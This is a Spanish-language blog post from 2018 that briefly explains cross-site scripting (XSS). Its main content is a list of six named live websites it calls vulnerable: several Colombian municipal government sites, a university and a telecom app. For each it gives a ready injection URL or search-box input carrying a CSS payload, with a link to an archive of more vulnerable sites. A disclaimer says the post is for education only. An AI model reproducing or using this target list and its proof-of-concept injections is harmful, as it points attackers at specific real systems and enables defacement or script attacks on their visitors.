miércoles, 17 de enero de 2018

Lista de paginas vulnerables a Cross-site scripting | XSS 🏆

 Que es Cross site scripting?


XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede realizarse a sitios web, aplicaciones locales e incluso al propio navegador.
Regularmente la mejor manera de llevar a acabo un ataque xss es haciéndose desde un formulario que no tiene filtros o verificación de contenido, a esto me refiero a que cuando un programador crea una pagina web, en muchos casos cuando pone un formulario, no utiliza filtros o algún sistema que no permita que los caracteres o el texto que el usuario envía por el formulario  interactúe con el código de la pagina, cuando el contenido del formulario se almacena directamente en una base de datos, esto hace que un ataque xss sea aun mas peligroso, ya que puede afectar permanentemente la estructura o el comportamiento de una pagina web hasta que el programador borre esta información de la base de datos, esto sucede gracias a que si se almacenamos código html, css, javascript...  en una base de datos, si se saca esta información a la vista del usuario, el navegador interpreta el contenido, como código fuente, mas no como texto.

NO ME HAGO RESPONSABLE DEL MAL USO DE ESTE CONTENIDO, EL OBJETIVO DE ESTE POST ES ÚNICAMENTE EDUCATIVO.


LISTADO DE PAGINAS WEB     VULNERABLES 



http://www.aguadas-caldas.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://www.pacora-caldas.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://inza-cauca.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://www.tabio-cundinamarca.gov.co/index.shtml?apc=B1--&s=v&nocache=1&als%5Bvbuscar%5D=<style>*{background:red}</style>

 http://umanizales.edu.co/  ----------> ingresar <style>*{background:red}</style> en el campo de busqueda de la esquina superior derecha

 http://app.claro.com.co/general/AnswerSMS.aspx?scc=15%27&msj=<style>*{background:red}</style>


PUEDES ENCONTRAR MAS PAGINAS SIMILARES EN EL SIGUIENTE LINK: http://xssed.com/archive


Lista de paginas que tienen el error o son vulnerables a xss o cross site scripting
Paginas vulnerables a cross site scripting xss




Related Posts:

1 comentario: